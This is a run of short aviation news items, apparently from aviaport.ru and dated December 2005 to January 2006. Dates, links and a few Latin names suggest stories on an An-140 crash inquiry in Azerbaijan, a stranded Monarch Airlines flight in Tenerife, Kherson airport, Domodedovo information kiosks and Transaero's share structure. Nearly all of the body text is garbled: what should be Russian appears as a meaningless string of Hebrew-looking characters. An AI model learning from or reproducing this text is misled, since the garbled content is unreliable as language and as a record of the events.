׀׃״בגא׀ל.ִ״׀ב״אׂ׀״ױ בגא״גױלבגׂ׀ ׀חױגבן בױ ג׃, ׀ ח״ׂ״״ אױט׀ג ׂאב ב ױאױׂװ ִױװאׂ״ ׂ אױ׃״׀לדמ בׁבגׂױבגל. "ֱױח׀ב כ דײױ ׁא׀ג״״בל ׂ אבב״בױ ׀׃ױגבגׂ "ְב״דיױבגׂ". ¸ ׀ םג׀ אזױװדא׀ (ױאױװ׀ח׀ ׂ בׁבגׂױבגל אױ׃״׀. - "") ױ ׁדװױג אׂױװױ׀, בגא״גױלבגׂד ׀םאאג׀ כ א״בגד׀גל ױ ׁדװױ. ¼כ ױ בױׂ׀ױבן, חג ׂבױ ױׁוװ״כױ ׁד׀׃״ ׁדװדג האױכ ׂ ױאׂ ׂ׀אג׀ױ בױװדמיױ׃ ׃װ׀", - װױ״בן א׃׳ °ױב׀װא ¿דט׀אױׂ. ¿ ױ׃ װ׀כ, בׂדכױ ׳׀גא׀גכ ׳׀ׂױאטױ״מ בגא״גױלבגׂ׀ ׂ׃ ב׃ ׀םאאג׀ בבג׀ׂןג ׁױױ 5 אװ אדׁ. ¿ בׂ׀ ״. . ׃ױױא׀ל׃ װ״אױגא׀ ¾°¾ "¾ב-ִױװאׂ׀" ²׀ױא״ן ¿ׂ׀, װ 65% ג ׁיױ׃ ׁךױ׀ ה״׀ב״אׂ׀״ן ׂ ׁדװדיױ ׃װד ׁדװױג ׀א׀ׂױ ׀ אױבגאדז״מ ׂ׳ױג-ב׀װח בכ. "ֱױח׀ב דײ ׁױבױח״גל ׁױבױאױׁױ ב׀ׁײױ״ױ בגא״גױל י׀װ״ ׂװ ״ םױגא״חױבגׂ, װ׃גׂ״גל ױבג׀ װן א׀׳ױיױ״ן מװױ ״ גױו״״, חגׁכ ׂ ׀אױױ ײ ׁכ א״בגד״גל ׀ג״ׂד בגא״גױלבגׂד", - בׁי״ ׃בװ״ ¿ׂ.¾ײ״װ׀ױגבן, חג אױ׳דלג׀גכ דאב׀ אױװױױ״מ ׃ױױא׀ל׃ װאןװח״׀ בגא״גױלבגׂ׀ ׀םאאג׀ ¾ב-ִױװאׂ׀ ח״ׂ״״ ׁ׀אװדמג בױ׃װן. - - - - - ¿א״׳ׂװ״גױ״ °-140 ב׃׀בכ ב ׂכׂװ׀״ ״בב״״ - http://www.aviaport.ru/news/2006/01/02/99270.html - ¿אױװבג׀ׂ״גױ״ ֵ³°¿¿ װגׂױאװ״״, חג ב׃׀בכ ב ׂבױ״ ׂכׂװ׀״, גאכ א״ט׀ ״בב״ן א׀בבױװׂ׀״מ א״ח״ ׀ג׀בגאהכ ב׀ױג׀ °-140 - Mon, 02 Jan 2006 13:05:00 +0300 - ²חױא׀ אױװבג׀ׂ״גױ״ ֵ׀אלׂב׃ ׃בדװ׀אבגׂױ׃ ׀ׂ״׀ז״׃ א״׳ׂװבגׂױ׃ אױװא״ןג״ן (ֵ³°¿¿) װגׂױאװ״״, חג ב׃׀בכ ב ׂבױ״ ׂכׂװ׀״, גאכ א״ט׀ ״בב״ן א׀בבױװׂ׀״מ א״ח״ ׀ג׀בגאהכ ב׀ױג׀ °-140, ׂ א׀ׁגױ גא א״״׀ דח׀בג״ױ ֵ³°¿¿. ¿בױ ׁ׀אװׂ׀״ן ױאׂכו אױ׳דלג׀גׂ א׀בבױװׂ׀״ן ׂ ױגאכו ֱ¼¸ ןׂ״׀בל ״הא׀ז״ן ג, חג א״׳ׂװ״גױ״ א׀׳ׁ״ׂטױ׃בן ב׀ױג׀ ױ א׀׳װױןמג ױ״ױ ״בב״״. ²חױא׀ םג׀ ״הא׀ז״ן ׁכ׀ אׂױא׃דג׀ װױ׀אג׀ױג בׂן׳ן ב ׁיױבגׂױבגלמ ֵ³°¿¿.÷״בב״ן, ׂ בבג׀ׂ גא ׂט״ אױװבג׀ׂ״גױ״ °½ֲ÷ ״. °גׂ׀ (א׀׳א׀ׁגח״ ב׀ױג׀), ·׀אײב׃ ׀ט״בגא״גױל׃ בגאדגאב׃ ׁמא "¿א׃אױבב" (א׀׳א׀ׁגח״ װׂ״׃׀גױן), ֵ³°¿¿ ״ ׳׀אײב ׀״״ "¼גא ֱ״ח" (א״׳ׂװ״גױל װׂ״׃׀גױױ), א׀בט״האׂ׀ׂ "חױאכ ןי״" א״ט׀ ׂכׂװד, חג ׀ ׂכבגױ 2100 ב׀ױג ׀ח׀ ב״ײױ״ױ ב״א׀״, בׂױאט״ׂ חױגכאױ ׂ״ג׀. ַױאױ׳ ױבל בױדװ בׂן׳ל ב ם״׀ײױ א׀׀, בױ חױ׃ ב׀ױג ״בחױ׳ ב א׀װ׀אׂ. ¿ױאׂכױ אױ׳דלג׀גכ א׀בבױװׂ׀״ן ׀׳׀״, חג װׂ״׃׀גױ״ ב׀ױג׀, ב״בגױכ דא׀ׂױ״ן ״ םױא׃ב׀ׁײױ״ן ׁכ״ ״בא׀ׂכ. ¿א״ח״ ׀ג׀בגאהכ ׃׀ בג׀גל ױ״בא׀ׂבגל ׀ׂ״׀׃א״׳גׂ - א״ׁאׂ, ׀׳כׂ׀מי״ו ײױ״ױ ב׀ױג׀ ׂ אבגא׀בגׂױ.½׀״, חג 23 װױ׀ׁאן װ ±׀ד א״׳ט אדטױ״ױ ב׀ױג׀ ו׀אלׂב׃ א״׳ׂװבגׂ׀ °-140, ׂכןׂטױ׃ אױב ±׀ד - °ג׀ד. ² אױ׳דלג׀גױ ׀ג׀בגאהכ ׃״ׁ״ 23 חױׂױ׀. ¿א׀ׂ״גױלבגׂ °׳ױאׁ׀װײ׀׀ א״בג׀ׂ״ םבד׀ג׀ז״מ ב׀ױגׂ °-140 װ ח׀״ן א׀בבױװׂ׀״ן א״ח״ ׀ג׀בגאהכ. - - - - - ְׁ״׳ "ױׂױ" - http://www.aviaport.ru/news/2006/01/02/99268.html - ¶״גױל ²ױ״ׁא״ג׀״״, ײױ׀ׂט״ ׂבגאױג״גל ½ׂכ ׃װ ׂ ׀״״ װאד׳ױ ׀ בגאׂױ ֲױױאױהױ, ׀ ׂ ׳׀גאדװ״גױלדמ ב״גד׀ז״מ, בג׀ׂ "ְׁ״׳ ױׂױ" - Mon, 02 Jan 2006 13:03:00 +0300 - ¶״גױל ²ױ״ׁא״ג׀״״, בגא׀בג ײױ׀ׂט״ ׂבגאױג״גל ½ׂכ ׃װ ׂ ׀״״ װאד׳ױ ׀ ״ב׀ב בגאׂױ ֲױױאױהױ, ׀ ׂ ׂױבל׀ ׳׀גאדװ״גױלדמ ב״גד׀ז״מ, בג׀ׂ ױאױװ א׀׳װ״ "ְׁ״׳ ױׂױ".÷׀װ״א ׀ׂ״׀׀ױא׀, בױװׂ׀ׂטױ׃ אױב ZB-558 ׀ ֲױױא״הױ ״׳ ¼׀חױבגױא׀, א״ן אױטױ״ױ בׂױאט״גל ױ׳׀׀״אׂ׀דמ ב׀װד, חגׁכ ׂכב׀װ״גל ױאױ״ׂטױ׃ ׂ ׂאױן אױב׀ ׀בב׀ײ״א׀. ֲג ׀ח׀ בׂױאבׂ״גל ׂ ׀װאױב ׀בב׀ײ״אׂ ״ ׀װכ, א״׃א״אׂ׀ׂ גאױׁׂ׀״ױ דב״גלבן. ² םגג ױג ׀ױא, ׀ ׁאגד גא׃ ׀וװ״״בל 210 חױׂױ, ױגױ ׀ ׂכבגױ 10 ״ױגאׂ.¸ וגן װ ֲױױא״הױ בג׀ׂ׀בל ׂבױ׃ 45 ״דג ױג׀, ם״׀ײ א״טױ ׂכׂװד, חג א״בדגבגׂ״ױ לן׃ גדא״בג׀ ד׃אײ׀ױג ׁױ׳׀בבג״ ױג׀. ¸ אױט״ בׂױאט״גל ױ׳׀׀״אׂ׀דמ ב׀װד, חגׁכ ׂכב׀װ״גל ׁא״ג׀ז׀ ׀ אטױח בגאׂױ ¿אג-ֱ׀ג, א׀בײױ ױװ׀ױ ג בױׂױא׃ ׁױאױײלן °הא״״.ֱדװן ׂבױד, ½ׂכ ׃װ ױד א״װױגבן ׂבגאױג״גל ׀ םג בגאׂױ ב ׀בױױ״ױ ׂ חױגכאױ גכבןח״ חױׂױ. ·װױבל ױג ׀׳״ ״ חכו דׁׂ. ° ױװ״בגׂױכ א׀׳ׂױחױ״ױ ױבגכו ײ״גױױ בג׀מגבן גל א׃ד״ ױבח׀כ װמ׀. ¿א׀ׂװ׀, ״ױ ׀ םג בגאׂױ, ב׃׀ב אױװ׀״ן, ױבל בגױג״ ׀׳׀װ ׁדװדי״ ױאׂגאכׂ׀גױל °ױא״״ ֵא״בגהא ÷דׁ ׳׀״בן ב בׂױ ׁדװדיױ ײױ. ֲ׀ ¿אג-ֱ׀ג ׂטױ ׂ ״בגא״מ.²אחױ, ד ׁא״ג׀ב׃ "ְׁ״׳׀" ױיױ בג׀ױגבן ט׀ב װׁא׀גלבן א׀׳װ״ד ׀ ֲױױא״הױ. ¿א׀ׂװ׀, גױױאל ױד א״װױגבן ׂכׁ״א׀גל: ״ׁ גא׀ׂ״גלבן ׀ בגאׂ ¼׀װױא׀ ׀ ׀אױ ״ דײױ גגדװ׀ ױאױבױבגל ׀ װאד׃ ב׀ױג װ ױבג׀ ׀׳׀חױ״ן, ״ׁ ׂױאדגלבן װ ׂ °׃״מ.°ׂ״׀׀״ן Monarch Airlines ׀ ױיױ ױ אױט״׀, װ׀ׂ׀גל ״ ׂ בדװ ׀ ױ׳׀װ׀ח״ׂ׃ ׁא״ג׀ז׀ ׂ בׂן׳״ ב ױ׳׀׀״אׂ׀כ ״׳ױױ״ױ ׀אטאדג׀, גאױ, בׂ׀ אױװבג׀ׂ״גױן ׀״״, ׁטבל ױ ׂ ױבל גכבןח הדגׂ בגױא״׃ׂ.÷בג׀ג״½ױבגאן ׀ חױגכאױוח׀בׂדמ ׳׀װױאײד, ׀בב׀ײ״אכ בגלמ װװױאײ׀״ אױטױ״ױ ם״׀ײ׀ ׂכב׀װ״גל בׂױאבׂ׀. ÷׀ בׁי״׀ ´ײ ְׁױאגב, אױװבג׀ׂ״גױל ׀ׂ״׀׀״״ Monarch Airlines, ׀אדט״גױמ בבגׂ״ן אױװײ״״ װ״ב׀גל אג, ׃װױ ׁכ ׳׀ה״ב״אׂ׀ ה׀ג ױ׃ ױװׁ׀מיױ׃ ׂױװױ״ן, װ׀ גג ג׀׳׀בן םג בװױ׀גל. - - - - - ²׳װדטױ אבגא׀בגׂ ֵ׀ׁ׀אׂב׀ דבגדױג - http://www.aviaport.ru/news/2006/01/02/99269.html - ¿ױאׂ׃ ןׂ׀אן ״׳ ֵ׀ׁ׀אׂב׀ ױ ׂכױג״ג ״ װ״ ב׀ױג. ¸׳ ֵ׀ׁ׀אׂב׀ ׂ ױאׂכ װױל ׃װ׀ ײ ׂכׁא׀גלבן גל ױ׳װ, ׀ ג׀ײױ ׀ׂגגא׀באג - Mon, 02 Jan 2006 13:03:00 +0300 - ¿ױאׂ׃ ןׂ׀אן ״׳ ֵ׀ׁ׀אׂב׀ ױ ׂכױג״ג ״ װ״ ב׀ױג. ²ג ׀ אױג״אׂ׀״ ב״גד׀ז״מ אאױבװױגד ¸° REGNUM ׂ װ״בױגחױאב ֵ׀ׁ׀אׂב׃ ׀םאאג׀: "ֱױ׃װן ״ װ״ ב׀ױג ״ו ֵ׀ׁ׀אׂב׀ ױ ׂכױג״ג. ֲ׀׀ן ב״גד׀ז״ן ׂ ֵ׀ׁ׀אׂבױ ׂױאׂכױ. ֱ׀ױגכ ״׳ ׃אװ׀ ױ ׂכױג׀מג ױ א״ח״ױ ױ״בא׀ׂבג״, ׀ א״ח״ױ גבדגבגׂ״ן אױבׂ. ¾ג ׀ב ׂ ½ׂכ ׃װ ״ג ״דװ׀ ױ ױג״ג. °ׂ״׀גאכ גװכו׀מג".¸׳ ֵ׀ׁ׀אׂב׀ ׂ ױאׂכ װױל ׃װ׀ ײ ׂכׁא׀גלבן גל ױ׳װ, ׀ ג׀ײױ ׀ׂגגא׀באג. - - - - - "ֲא׀ב׀םא" א׀באכ בגאדגדאד ׀ז״ױא׃ ׀״ג׀׀ - http://www.aviaport.ru/news/2005/12/29/99267.html - ¾°¾ "°ׂ״׀׀״ן "ֲא׀ב׀םא" א׀באכ בגאדגדאד בׂױ׃ ׀ז״ױא׃ ׀״ג׀׀. 32,1% ׀ז״ גא״אדױג "»׃²°·-»", 44,1% ׂ׀װױמג חױכ בױל״ °. ¿ױט׀ׂ׀ - Thu, 29 Dec 2005 17:30:00 +0300 - ¾°¾ "°ׂ״׀׀״ן "ֲא׀ב׀םא" א׀באכ בגאדגדאד בׂױ׃ ׀ז״ױא׃ ׀״ג׀׀. ÷׀ בױװדױג ״׳ ה״ז״׀לכו ׀גױא״׀ׂ ׀״״, 32,1% ׀ז״ גא״אדױג "»׃²°·-»", 44,1% ׂ׀װױמג חױכ בױל״ אױװבױװ׀גױן בׂױג׀ װ״אױגאׂ "ֲא׀ב׀םא" °ױב׀װא׀ ¿ױט׀ׂ׀. "»׃²°·-»", דחאױײװױכ ׂ 1996 ׃װד ׀״ױ "»׃²°·", גא״אדױג ׀ז״״ "ֲא׀ב׀םא" חױאױ׳ בׂ״ װחױא״ױ בגאדגדאכ - ·°¾ ±אױ-2" ״ ·°¾ "ְ׀ג״א+". ¿ װ׀כ ״בגח״׀ "¸גױאה׀ב׀" ׂ ׀ׂ״׀ז״ גא׀ב״, בױח׀ב "»׃²°·-»" דײױ ױ א״׀װױײ״ג "»׃²°·ד".ֱ׃׀ב װדױגד, אױװבױװ׀גױמ בׂױג׀ װ״אױגאׂ "ֲא׀ב׀םא" °ױב׀װאד ¿ױט׀ׂד א״׀װױײ״ג 32,81% ׁכׂױכו ׀ז״, ׀ ױ׃ בדאד׃ױ, ׃ױױא׀לד װ״אױגאד °¾ ¾ל׃ױ ¿ױט׀ׂ - 8,08%. ÷אױ ג׃, 3,25% ׀ז״ "ֲא׀ב׀םא" א״׀װױײ׀ג ׀גױא״ ¿ױט׀ׂ׀, אױװבױװ׀גױמ ¼ױײ׃בדװ׀אבגׂױ׃ ׀ׂ״׀ז״׃ ״גױג׀ ֲ׀גלןױ °װ״.¾°¾ "°ׂ״׀׀״ן "ֲא׀ב׀םא" ׀בב׀ײ״אׁאגד ׂוװ״ג ׂ ח״ב ןג״ אדױט״ו אבב״ב״ו ׀ׂ״׀׀״. ²כאדח׀ ג אױ׀״׳׀ז״״ ׳׀ 11 ױבןזױׂ 2005 ׃װ׀ - 8,9 אװ אדׁױ, ׀בב׀ײ״אׁאג - 4,8 אװ ׀בב׀ײ״א-״ױגאׂ. - - - - - ² ׀םאאגד "÷דאדח" ׀ח׀׀ װױבגׂׂ׀גל ׂ׀ן בא׀ׂח׀ן ב״בגױ׀ TouchTown (ֱ׀׀א׀) - http://www.aviaport.ru/news/2005/12/29/99266.html - ² ¼ױײװד׀אװ ׀םאאגד "÷דאדח" ׀ח׀׀ װױבגׂׂ׀גל ׂ׀ן ¸הא׀ז״-בא׀ׂח׀ן ב״בגױ׀ TouchTown - Thu, 29 Dec 2005 17:27:00 +0300 - ² ¼ױײװד׀אװ ׀םאאגד "÷דאדח" ׀ח׀׀ װױבגׂׂ׀גל ׂ׀ן ¸הא׀ז״-בא׀ׂח׀ן ב״בגױ׀ TouchTown, - בׁי״״ אאױבװױגד ¸° REGNUM-²׃׀¸הא ׂ אױבב-בדײׁױ ׀םאאג׀. ³׀ׂכ װבג״בגׂ ב״בגױכ ןׂןױגבן ױא׀ג״ׂױ אױװבג׀ׂױ״ױ ױׁוװ״ ׀בב׀ײ״אד ״הא׀ז״״ ב ״בל׳ׂ׀״ױ ׁױ׳׃א׀״חכו ׂ׳ײבגױ דלג״ױװ״׀. ֲױױאל ׀ׂ״׀׀בב׀ײ״אכ א״ י״ בױבא׃ גױא״׀׀ ׃דג דח״גל א׀ג״חױב״ מׁדמ ״הא׀ז״מ ױ גל ׁ ׀םאאגױ, ״ ֱ׀׀אױ ׂ זױ. ֲ׀, װ׀כױ ב״בגױכ "TouchTown" װױױכ ׀ װׂ׀ ׁ׀: "¿דגױׂװ״גױל ¼ױײװד׀אװד ׀םאאגד "÷דאדח" (׳װױבל ׀בב׀ײ״אכ ׃דג ׳׀״גלבן ב ׀ ױיױ״ ׀םאאג׀ ״ א״ױ׃׀מיױ ױד גױאא״גא״״, ׀ ג׀ײױ ד׳׀גל אױװבג׀ׂןױכו דבד׃׀ו) ״ "²בן ֱ׀׀א׀" (ׂ ׁױ בװױאײ״גבן ״הא׀ז״ן ׃בג״״ז׀ו, ױבג׀ו גװכו׀, א׀׳ׂױ׀גױלכו ״ גא׃ׂכו זױגא׀ו, ׀״ןו, ׀׳כׂ׀מי״ו א׀׳״חכױ גאױׁ״גױלב״ױ דבד׃״). - - - - - ֵ³°¿¿ א״׳כׂ׀ױג ײדא׀״בגׂ ׁכגל ׀ב״׀ל אאױגכ״ ׂ בׁיױ״ןו א׀ׁגױ ״בב״״ א׀בבױװׂ׀״מ א״ח״ ׀ג׀בגאהכ ב׀ױג׀ °-140-100 - http://www.aviaport.ru/news/2005/12/29/99265.html - ² ±׀ד בבגן׀בל אױבב-הױאױז״ן ״ג׃׀ אױװׂ׀א״גױל׃ א׀בבױװׂ׀״ן א״ח״ ׀ג׀בגאהכ ב׀ױג׀ °-140-100 - Thu, 29 Dec 2005 17:18:00 +0300 - 28 װױ׀ׁאן 2005 ׃. ׂ ±׀ד בבגן׀בל אױבב-הױאױז״ן ״ג׃׀ אױװׂ׀א״גױל׃ א׀בבױװׂ׀״ן א״ח״ ׀ג׀בגאהכ ב׀ױג׀ °-140-100. ¾ אױ׳דלג׀ג׀ו א׀ׁגכ װײ״״ ג ״ױ״ ״בב״״ א׀בבױװׂ׀״מ ´ײ׀ו׀׃״א °בױאׂ - ׃ױױא׀לכ װ״אױגא ׃בדװ׀אבגׂױ׃ זױא׀ AZAL, ¿׀ׂױ ½׀דױ - ׃ױױא׀לכ װ״אױגא ֵ׀אלׂב׃ ׃בדװ׀אבגׂױ׃ ׀ׂ״׀ז״׃ א״׳ׂװבגׂױ׃ אױװא״ןג״ן, ±א״ב ³אמׂ - אױװבג׀ׂ״גױל ¼ױײ׃בדװ׀אבגׂױ׃ °ׂ״׀ז״׃ ÷״גױג׀, ²״ג׀״ ¼״יױ - װ״אױגא װױ׀אג׀ױג׀ ״בױג״אׂ׀״ן ׁױ׳׀בבג״ ױגׂ ³ב׀ׂ״׀בדײׁכ ֳא׀״כ, ¸ל׃׀ °״אׂ - אױװבױװ׀גױל גױו״חױב ״בב״״ א׀בבױװׂ׀״מ ׀ג׀בגאהכ. ² ׂאױן אױבב-הױאױז״״ ׁכ׀ ׃׀טױ׀ בױװדמי׀ן ״הא׀ז״ן.23 װױ׀ׁאן 2005 ׃. בױ ׂכױג׀ ״׳ ׀םאאג׀ ±׀ד גױאױ ׀ג׀בגאהד ׂ א׀ױ בױ׀ ½׀אװ׀א׀ ׀ ׁױאױײלױ ÷׀ב״ב׃ אן ב׀ױג °-140-100 (׀ז״׀לכ ״ אױ׃״בגא׀ז״כ ׳׀ 4÷-AZ48) ½׀ז״׀ל ׀ׂ״׀׀״״ "°׳ױאׁ׀װײ׀ ֵ׀ׂ׀ ¹׀אכ". ֱ׀ױג, ׂכןׂט״ אױב AHY 217 ׀אטאדגד ±׀ד (°׳ױאׁ׀װײ׀) - °ג׀ד (÷׀׳׀ובג׀) ״ױ ׀ ׁאגד 18 ׀בב׀ײ״אׂ ״ 5 חױׂ ם״׀ײ׀ (׀װ״א »׀ׂא״ °.°.). ² אױ׳דלג׀גױ ׀ג׀בגאהכ ׃״ׁ 23 חױׂױ׀, ׀וװ״ׂט״ובן ׂ ב׀ױגױ, ׂ ג ח״בױ 5 חױׂ ם״׀ײ׀ ״ 18 ׀בב׀ײ״אׂ, באױװ״ גאכו ׁכ״ ׃א׀ײװ׀ױ °׳ױאׁ׀װײ׀׀ (10), °ׂבגא׀״״ (1), ²ױ״ׁא״ג׀״״ (1), ³אד׳״״ (1), ÷׀׳׀ובג׀׀ (4), ״ ֲדאז״״ (1). ²ֱ בגלמ א׀׳אדטױ.² אױ׳דלג׀גױ א׃׀״׳ׂ׀׃ ״ב׀ ׁ״ ²ֱ ׁכ״ ׁ׀אדײױכ ׀ ׁױאױ׃ׂ חױאגױ ׂ א׀ױ ׀בױױ׃ דג׀ ½׀אװ׀א׀. ¿אׂױװױ״ױ ׀ׂ׀א״-ב׀ב׀גױלכו א׀ׁג בײןבל גױכ ׂאױױױ בדג ״ ױׁ׀׃א״ןגכ״ ׃װכ״ דבׂ״ן״ (״׳׀ן ׁ׀חבגל, װײװל, ׂױגױא ״ ׂױ״ױ אן). ÷ ״בׂכ א׀ׁג׀ ױױװױ ׁכ״ א״ׂױחױכ ב״כ ׀ׂ׀א״-ב׀ב׀גױלכו בדײׁ, ¼²´, ³בדװ׀אבגׂױ ׃א׀״ח בדײׁכ, ³א׀ײװ׀ב ׁאכ ְױבדׁ״״ °׳ױאׁ׀װײ׀. ² וװױ א׀ׁג ׁכ״ םׂ׀ד״אׂ׀כ בג׀״ ׂבױו ׃״ׁט״ו. ¿אװײ׀מגבן א׀ׁגכ ״בד ״ ״׳ׂױחױ״מ ״׳ אן הא׀׃ױגׂ ²ֱ.÷״בב״ן א׀בבױװׂ׀״מ ׀ׂ״׀׀ג׀בגאהכ ב׀ױג׀ °-140-100 4÷-AZ48, ״׳דח״ׂ װ׀כױ ׁךױג״ׂ׃ גאן, בןגכױ ב ׳׀י״יױ׃ ׁאגׂ׃ ׀״גױן דבגאבגׂ׀ אױ׃״בגא׀ז״״ ±ְֳ-92°, ׀ ג׀ײױ, בבג׀ׂ״ׂ ״ו ב ״הא׀ז״ױ װ״בױגחױאב״ו בדײׁ, ׀גױא״׀׀״, בׁא׀כ״ ׀ ױבגױ ׀ג׀בגאהכ, ׂבבג׀ׂ״׀ אױװׂ׀א״גױל בױװדמידמ ׀אג״ד בׁכג״.²׳ױג בבגןבן ׂ בגׂױגבגׂ״״ ב א׀ב״ב׀״ױ. ½׀ םג׀ױ ׀ׁא׀ ׂכבגכ א״׳ט דױ״ױ ׂ׳װדט׃ בדװ׀ (²ֱ) ג דבג׀ׂױ גא׀ױגא״״ ױג׀. ·׀גױ ם״׀ײ בׁי״ בדײׁױ ֳ²´ גױו״חױב״ו אׁױ׀ו ׀ ׁאגד ²ֱ. ַױאױ׳ ױבל בױדװ בׂן׳ל ב ם״׀ײױ א׀׀, ׀ גױג׀ ²ֱ ״בחױ׳׀ ב םא׀ׂ א׀װ׀א׀. ¿ װ׀כ ׁךױג״ׂ׃ גאן בױ ׀ׁא׀ ׂכבגכ װ 2100 ב׀ױג ׀ח׀ ב״ײױ״ױ ״בוװןיױ ב״א׀״ ב דױלט׀מי״״בן א׀װ״דב׀״ ג 500 װ 100 , בׂױאט״ׂ א״ םג 4,5 ׂ״ג׀.ְ׀בט״האׂ׀ ׁאגׂ׃ דבגאבגׂ׀ אױ׃״בגא׀ז״״ ׀׳׀׀, חג װׂ״׃׀גױ״ ²ֱ, ב״בגױכ דא׀ׂױ״ן, םױא׃ב׀ׁײױ״ן ״ װאד׃״ױ ׁכ״ ״בא׀ׂכ ״ א׀ׁגבבׁכ.½׀ םג׀ױ ׀ׁא׀ ׂכבגכ ׁאגׂכ דבגאבגׂ אױ׃״בגא׀ז״״ ׁכ ׳׀ה״ב״אׂ׀ װׂאױױױ גבדגבגׂ״ױ ״װ״׀ז״״ ם״׀ײד ׂבױו גאױו ׀ׂ״׀׃א״׳גׂ (׀ׂ״׀׃א״׳ג - א״ׁא, ׀׳כׂ׀מי״ ם״׀ײד ײױ״ױ ²ֱ ׂ אבגא׀בגׂױ).÷ ׀בגןיױד ׂאױױ״ א״ח״׀ גבדגבגׂ״ן ״װ״׀ז״״ ׀ׂ״׀׃א״׳גׂ ױ דבג׀ׂױ׀. ³ױױא׀לכ װ״אױגא זױא׀ AZAL ´ײ׀ו׀׃״א °בױאׂ ׳׀ןׂ״ ׀ אױבב-האױז״״: "ֽג׀ ב״גד׀ז״ן ױ בג׀װ׀אג׀ן ״ ד״׀ל׀ן, םגד ג, חג א״׳ט, ןׂןױגבן בױװבגׂ״ױ ױ״ו בׁכג״, גאכױ ׁדװדג ״׳דח׀גלבן". ְ׀ׁג׀ ״בב״״ אװײ׀ױגבן.¿ אױױװ׀ז״״ ״בב״״ ¿א׀ׂ״גױלבגׂ °׳ױאׁ׀װײ׀׀ א״ן אױטױ״ױ ׂאױױ א״בג׀ׂ״גל, װ ׳׀ׂױאטױ״ן א׀בבױװׂ׀״ן ׀ג׀בגאהכ, םבד׀ג׀ז״מ °-140-100 ׂ ׀ׂ״׀׀״״ "°׳ױאׁ׀װײ׀ ֵ׀ׂ׀ ¹׀אכ". ÷גא׀ג ױײװד זױא AZAL ״ ֵ׀אלׂב״ ׃בדװ׀אבגׂױכ ׀ׂ״׀ז״כ א״׳ׂװבגׂױכ אױװא״ןג״ױ בג׀ױגבן ׂ ב״ױ, װ׀ בא״ ׂכױ״ן ױ׃ ׁדװדג באאױג״אׂ׀כ ב דחױג ח׀גױלכו ׂכׂװׂ ״בב״״, גאכױ ׃׀בןג אױ׳דלג׀ג׀ א׀בבױװׂ׀״ן ׀ג׀בגאהכ ב׀ױג׀ °-140-100, א״׳טױװטױ 23 װױ׀ׁאן 2005 ׃װ׀.½׀ אױבב-הױאױז״״, בבגןׂטױבן 28 װױ׀ׁאן ׂ ±׀ד, ׁכ ׃׀טױ ׳׀ןׂױ״ױ ״בב״״ א׀בבױװׂ׀״מ א״ח״ ׀ג׀בגאהכ, ב׃׀בׂ׀ױ ב ׂבױ״ ױױ דח׀בג״׀״, ׂ ג ח״בױ ״ ב אױװבג׀ׂ״גױן״ ֵ³°¿¿. ¿םגד דׁ״׀ז״״ אןװ׀ םױגאכו ֱ¼¸, בװױאײ׀י״ױ ״הא׀ז״מ ג, "חג א״׳ׂװ״גױ״ ב׀ױגׂ ױ ב׃׀בכ ב ׂכׂװ׀״ ״בב״״", ױ בגׂױגבגׂדמג װױבגׂ״גױלבג״.ֵ³°¿¿ ׁא׀י׀ױג ׂ״׀״ױ ׀ ױװדבג״בגל א״׳ׂלכו ״גױאאױג׀ז״ ׳״ז״״ אױװא״ןג״ן ״ װחױא״ׂ׀ױג, חג ״ ׂ װ ״׳ ״גױאׂלמ, װ׀ אױװבג׀ׂ״גױן ֱ¼¸, ״ װ״ ״׳ אדׂװ״גױױ אױװא״ןג״ן ױ ׂכב׀׳כׂ׀ ״ ׂױאב״ ׀ג׀בגאהכ ב׀ױג׀ °-140-100, ״ ױ״, אג״ׂאױח׀י״ו ׂכׂװ׀ ״בב״״ ױױ א׀בבױװׂ׀״מ. - - - - - °םאאג "ֵױאב" ״יױג זױי״׀ - http://www.aviaport.ru/news/2005/12/29/99264.html - »״ׂ״װ״אדױױ ד׀לױ אױװא״ןג״ױ "°םאאג "ֵױאב" ׁךןׂ״ דאב גׁאד זױי״׀ בׂױ׃ זױבג-״דיױבגׂױ׃ ױב׀ - Thu, 29 Dec 2005 16:57:00 +0300 - »״ׂ״װ״אדױױ ד׀לױ אױװא״ןג״ױ "°םאאג "ֵױאב" ׁךןׂ״ דאב גׁאד זױי״׀ בׂױ׃ זױבג-״דיױבגׂױ׃ ױב׀.¾ׁ םג ׃ׂא״גבן ׂ בׁיױ״״ ׀םאאג׀, בׁי׀ױג ֳא׀קבלצ ½ׂ״״.¾זױ׀ אׂװ״גבן װן דבג׀ׂױ״ן א׀׳ױא׀ ׂ׳ב׀ ׂ דבג׀ׂכ הװ, גאכ ׂב״גבן ֵױאבב״ ׁ׀בגכ בׂױג ׂ ב׳װ׀ׂ׀ױױ ׀ ׁ׀׳ױ ׀םאאג׀ ׁיױבגׂ ב ׃א׀״חױ גׂױגבגׂױבגלמ "°םאאג "ֵױאב".ֳח׀בג״׀ דאב׀ ױׁוװ״ װ׀גל װדױגכ ׂ דאבדמ ״בב״מ װ 12 ןׂ׀אן 2006 ׃װ׀ (ׂמח״גױל).°םאאג ׀וװ״גבן ׀װאױבד: 73038, ֵױאב-38.¾א׃׀״׳׀ז״-א׀ׂׂ׀ן הא׀ ׀םאאג׀ "ֵױאב" - ד׀ל׀ן בׁבגׂױבגל (בׂױבג׀ן בׁבגׂױבגל גױאא״גא״׀לכו ׁי״ ׁ׀בג״). - - - - - ¾¾¾ "»ֳ÷¾¹»-°םא" א״ׁאױ ד ׀ׂ״׀׀״ן "ֱ״ׁ״אל" ג״ׂ׳׀א׀ׂחכ ױב ׂ ױײװד׀אװ ׀םאאגד ַױןׁ״ב׀ - http://www.aviaport.ru/news/2005/12/29/99263.html - ¾¾¾ "»ֳ÷¾¹»-°םא" (100-אזױג׀ן װחױאןן ׀״ן ¾°¾ "»ֳ÷¾¹»") א״ׁאױ ד ¾°¾ "°ׂ״׀׀״ן "ֱ״ׁ״אל" ֲ·÷ "±׀׀װ״" ׂ ױײװד׀אװ ׀םאאגד ַױןׁ״ב׀ - Thu, 29 Dec 2005 16:55:00 +0300 - ¾¾¾ "»ֳ÷¾¹»-°םא" (100-אזױג׀ן װחױאןן ׀״ן ¾°¾ "»ֳ÷¾¹»") א״ׁאױ ד ¾°¾ "°ׂ״׀׀״ן "ֱ״ׁ״אל" ג״ׂ׳׀א׀ׂחכ ױב (ֲ·÷) "±׀׀װ״" ׂ ױײװד׀אװ ׀םאאגד ַױןׁ״ב׀, בׁי׀ױג אױבב-בדײׁ׀ »ֳ÷¾¹»׀. ³װׂ ׁךױ ׳׀א׀ׂ״ בבג׀ׂןױג א״ױא 40 גכב. ג. ² ׁ״ײ׀טױױ ׂאױן ¾¾¾ "»ֳ÷¾¹»-°םא" ׀״אדױג 